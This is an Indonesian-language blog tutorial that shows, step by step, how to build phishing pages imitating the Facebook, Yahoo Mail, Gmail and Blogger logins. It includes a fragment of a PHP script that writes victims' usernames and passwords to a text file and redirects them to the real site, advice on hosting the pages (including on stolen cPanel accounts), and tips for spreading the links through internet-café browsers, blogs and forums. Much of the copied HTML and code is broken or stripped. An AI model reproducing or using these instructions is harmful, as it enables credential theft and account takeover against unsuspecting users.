Tips Lengkap Membuat Fake Login

Posted by Abdillah Hasny Monday, June 6, 2011 0 comments

Tips Lengkap membuat Fakelogin Facebook,Blogger,Yahoo mail dan google mail.

TUTORIAL INI DIBUAT UNTUK SEKEDAR BERBAGI ILMU PENGETAHUAN, SEGALA AKIBAT YANG DITIMBULAKAN, BUKAN TANGGUNG JAWAB PENULIS LAGI KARENA DUNIA MAYA MILIK PERADABAN....TUKAR PIKIRAN DAN PENYEBARAN ILMU SANGAT TIDAK TERKENDALI DAN KADANG ILMU ITU JATUH KE TANGAN-TANGAN DENGAN KEPRIBADIAN BERBEDA.....SEGALA KERUSAKAN YANG DITIMBULKAN ATAS TINDAKAN PEMBACA....ITU ADALAH TANGGUNG JAWAB PEMBACA.TERIMAKASIH!!!


Ini adalah artikel yang panjang, bila anda ingin belajar bersama saya, silahkan lanjutkan membaca, namun jika ingin sekedar blogwalking, silahkan meninggalkan komentar dan tutup halaman blog ini. Buat para master mohon saran dan kritiknya bila apa yang saya tuliskan kali ini merisaukan dan menyalahi aturan versi anda masing-masing.....mohon blimbinganya ya ^_^.

Saya akan memberikan tips lengkap cara membuat fakelogin, BUKAN hanya untuk facebook, tapi juga untuk halaman login lain seperti Yahoo.Mail, Google.Mail, Blogger, Windows Live dan panduan untuk membuat halaman login lain yang anda inginkan. Menurut pesan yang di sampaikan oleh teman saya, "Jika kita membagikan ilmu kepada orang lain maka Allah akan membagikan ilmu yang tidak diketahuinya." untuk itulah saya mencoba membagi hasil tweaking dan temuan saya ini pada anda semua agar Allah juga membagikan ilmunya yang lain yang belum saya ketahui, amin.

SAYA TIDAK MENYEDIAKAN HALAMAN FILE JADI YANG TINGGAL PAKAI, KARENA ITU BUKAN BELAJAR, TAPI NGAREP DAPET INSTAN.....SAYA AKAN MEMBUAT TUTORIAL CARA MEMBUAT DAN ANDA HARUS KERJA KERAS SENDIRI BILA INGIN BERHASIL.

Tutorial ini memakai write.php yang sama dengan Tutorial lainya, hanya saja ada yang sedikit berbeda......apa bedanya? Mungkin bukan teknik baru, namun cara panduan yang saya usahakan selengkap mungkin, sehingga memiliki ke-khasan serta originalitas tulisan, milik w3d0z-hacker, silahkan anda membaca dan merasakan sendiri.

## Pertama cari halaman login yang ingin anda buatkan fakepage nya. Misal :
yahoo
googlemail
facebook
blogger

## Kedua setelah anda masuk pada halaman login asli, tekan ctrl + u, kemudian copy-paste ke notepad semua sourcecodenya. Sampai disini anda masih dalam proses pencarian target page, belum melakukan tweaking sama sekali, pastikan sourecode yang anda kopas lengkap mulai dari sampai ## Oke, anda tidak bingung dan masih tetap telaten mengikuti ocehan saya yang tidak bermutu. Langkah selanjutnya adalah mencari kode form login, berikut ini adalah contoh 5 jenis kode login milik beberapa page yang saya sebutkan di atas.

yahoo




































(e.g. free2rhyme@yahoo.com)















(Uncheck if on a shared computer)













googlemail



action="https://www.google.com/accounts/ServiceLoginAuth" method="post"

onsubmit=
"return(gaia_onLoginSubmit());"
>








value="default">

value="2">








email-row">






























Sign in with your








Google


Account







Username:




value="http://mail.google.com/mail/?ui=html&zy=l" />

value="mail" />

value="false" />


value="4898553584776093452" />

value="default" />

value="default" />

value="1" />

value=''/>

value=''/>

name="GALX"
value="5aFIypTi760" />

size="18" value=""


class='gaia le val'

/>


ex: pat@example.com




Password:



name="Passwd" id="Passwd"
size="18"




class="gaia le val"

/>













Can't access your account?









facebook




blogger


Masuklah menggunakan Akun Google Anda









(?)






Lihat kode yang saya cetak biru, itu lebih baik di hilangkan karena tidak berfungsi apa-apa sedangkan yang cetak merah, kode itulah yang harus anda ganti dengan kode di bawah ini........



Setelah proses tweaking login page ini selesai, simpan file anda dengan nama terserah namun dengan format .php atau .html, misal facebook.html/mail.html/login.php/yahoo.php
Bila anda menggunakan editing notepad, jangan lupa mengubah format menjadi all files dan beri encoding utf-8. kenapa harus utf-8 kok bukan unicode? karena utf-8 adalah encoding yang di support oleh banyak browser saat ini dan dipakai oleh bnyak halaman situs.

Oke jadi intinya yang di ganti adalah header form, input email dan input password. Sebenernya ada banyak yang harus dimodifikasi agar data yang tersimpan tidak terlalu banyak, tapi cukup ini aja dulu...nantinya bila anda sudah faham betul akan mengerti mana yang boleh untuk di modifikasi

## Berikutnya adalah membuat file php nya, catatan : file ini harus berformat .php karena berisi program yang akan meyimpan username serta password dari si korban. Berikut kodenya :



$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

File di atas di simpan menjadi write.php ya..........

Editing tips : kenapa dalam kode tersebut mencantumkan alamat http://www.facebook.com ? karena setiap korban yang login ke situs fake kita, akan di alihkan ke alamat tersebut begitu dia meng-klik input "login", sudah barang tentu kode ini cocok untuk membuat facebook fakepage, bila anda ingin membuat fakepage yahoo...tentu saja alamat tersebut harus anda ganti dengan http://www.yahoo.com sehingga siapa saja yang login di situs anda akan langsung di alihkan ke halaman asli yahoo.
Passwords.txt adalah tempat penyimpanan semua password yang terekam, anda bisa mengganti menjadi login.txt, simpan.txt, daftar.txt sesuka anda.

## Langkah terakhir adalah mengupload ke webhosting, simpan kedalam direktori yang sama,silahkan memakai hosting apapun yang anda punya, termasuk cpanel hasil rampokan hehehe, dengan begitu keseluruhan proses pembuatan fakelogin selesai. Tinggal melakukan test saja, berikut adalah panduan testing fakelogin, bagi anda yang masih pemula seperti saya, saya buat panduan testing ini karena dulu saat saya belajar, tidak ada tutorial yang memberikan segala hal tentang cara memakai fakelogin tersebut secara detail, akibatnya, disaat terjadi problem, saya kebingungan dan tidak tau bertanya pada siapa (catatan : ada banyak master yang terkadang meremehkan semangat para pemula, entah takut di saingi, entah pelit ilmu, tapi kita positif tinking aja deh...kali aja si master lagi badmood atau kebelet, jd ga mau jawab waktu di tanya )


Panduan testing fakelogin :

** Setelah dua file diatas anda upload ke satu direktori yang sama maka file tersebut siap dijalankan. Ingat, harus dalam direktori/folder yang sama.
** Umpamakan anda membuat fakelogin yahoo, filenya adalah login.php dan write.php tempat penyimpanan adalah password.txt direktori penyimpanan adalah yahoo, domain hosting anda adalah http://w3d0z.com/
**Cara melakukan test adalah ketikan alamat seperti berikut http://www.w3d0z.com/yahoo/login.php tekan enter agar halaman terbuka secara sempurna.
** Masukan username terserah dengan password terserah asalkan anda ingat betul kalau itu adalah kata yang anda ketikan. Klik masuk/login tergantung value yang di deteksi browser memakai bahasa apa.
** Jika berhasil, akan tercipta sebuah file baru bernama password.txt (tergantung yang anda set di write.php nya). lalu halaman akan teralihkan ke halaman situs asli yahoo (tergantung pula dengan settingan alamat header location di write.php yang anda buat)
**Coba buka file brankas password dengan mengetikan http://www.w3d0z.com/yahoo/password.txt enter/go. Jika not found berarti fakelogin gagal di buat meskipun halaman telah terdirect menuju situs asli. Jika muncul halaman putih dengan rincian username dan password yang anda ketikan tadi, maka fakelogin sukses anda buat, dan selamat menjebak,membohongi dan merampok akun siapapun yang menjadi target anda.(anda berbuat anda pula yang bertanggung jawab ya...)

Kenapa terjadi eror?

@@ Alasan utama, mungkin ada pada hosting anda, bisa jadi analistic hosting gratis yang anda pakai melarang untuk menjalankan program seperti write.php karena termasuk program jahat/phising. Maka dari itu bila anda memakai 000webhost.com, fretzi.com dan 000space.com bersiaplah mengalami masalah ini. Solusi : Cari hosting lain seperti bluechiphosting (gratis) atau sekalian modal untuk belajar hacking, belilah ruang host file di ruangweb.com,IDwebhost.com,IDwebspace.com dan hosting berbayar lainya, dijamin anda bebas menggunakan space hosting tersebut karena anda memiliki hak dan kontrol penuh (bayar cuy...maklumlah hehe). Bagi anda yang udah memiliki cpanel rampasan, bisa juga di pakai kok.
@@ Alasan lain, mungkin tweaking anda masih kurang bener, salah pengkodean atau anda tidak menyimpan dalam satu direktori yang sama. cek kembali file manager anda :)
@@ Berikutnya, mungkin anda menyimpan halaman fake facebook,yahoo, gmail dan windows live dalam direktori sama dengan write.php berbeda-beda, wah kacau....yang ini jelas kacau......satu fakelogin harus ada satu write.php dengan source code berbeda-beda tergantung situs aslinya.....Solusi : lakukan tweaking ulang...beri nama berbeda-beda untuk write.php nya...misal untuk facebook.html memakai write.php untuk yahoo.html memakai oke.php untuk gmail.html memakai simpan.php kemudian lakukan editing pada write.php" name="menubar_login" id="menubar_login"> pada masing-masing halaman login, sehingga programnya ndak mumet dengan tingkah anda hehehehihihihi...atau lebih praktis satu jenis fakelogin punya satu direktori tersendiri jadi ndak ribet ngedit-ngedit terus.
@@ Alasan terakhir "anda lagi apes hehehe", lha habis gimana lagi? cuman ada tiga alasan lho.....kalau ada alasan lain tolong kasih masukan ya, sakit kek,izin ke rumah paman kek, kehujanan kek, atau jalan macet juga boleh hehehe....maklum, saya cuman lulusan SMU,jadi nulis sebisanya aja.

Tips optimasi dan penyebaran.
Waduh pake optimasi segala kayak ngeblog hehe
$$ Lakukan customisasi subdomain melalui cpanel anda , misal untuk facebook menjadi http://facebook.w3d0z.com/ untuk yahoo menjadi http://yahoo.w3d0z.com dan seterusnya, cara kustom subdomain tersebut akan saya buatkan insya allah secepatnya.......untuk sementara ini anda bisa googling atau pakai cara biasa aja deh.
$$ Masukan url fakelogin anda di warnet2 yang ada di daerah anda, cari tutorial pemobol deepfreeze agar url tersebut tetap tersimpan di peramban web warnet. Kelemahanya cuman satu " bila warnet memakai shadow defender pembobol deepfreeze anda tidak akan berguna"
$$ Sebarkan melalui blog, situs forum dan lain sebagainya terserah cara anda masing-masing.

Pesan :
Kata om ben parker (pamanya spiderman itulho!!!) "IN GREAT POWER COMES GREAT RESPONSIBILITIES" : SEIRING KEKUATAN YANG BESAR ATAU ILMU YANG TINGGI PASTILAH AKAN MUNCUL TANGGUNG JAWAB YANG BESAR PULA.....JADI APAPUN YANG ANDA PERBUAT DENGAN KEMAMPUAN YANG ANDA MILIKI TENTUNYA ANDA HARUS SIAP MEMPERTANGGUNG JAWABKANYA. UNTUK ITU PERGUNAKAN KEMAMPUAN ANDA DEMI KEPENTINGAN YANG BAIK...JANGAN MENYALAHGUNAKAN ANUGRAH TUHAN UNTUK HAL-HAL YANG MERUGIKAN ORANG BANYAK......
TERIMA KASIH ATAS KUNJUNGAN SAUDARA
Judul: Tips Lengkap Membuat Fake Login
Ditulis oleh Abdillah Hasny
Rating Blog 5 dari 5
Semoga artikel ini bermanfaat bagi saudara. Jika ingin mengutip, baik itu sebagian atau keseluruhan dari isi artikel ini harap menyertakan link dofollow ke http://bost-soft.blogspot.com/2011/06/tips-lengkap-membuat-fake-login.html. Terima kasih sudah singgah membaca artikel ini.

0 comments:

Post a Comment

Komentar Menggunakan Etika
Jangan Berkata-kata Kasar
Jangan Sara
Jangan Share Link
Jangan Bikin Keributan

Template by Berita Update - Trik SEO Terbaru. Original design by Bamz | Copyright of Bost-Soft.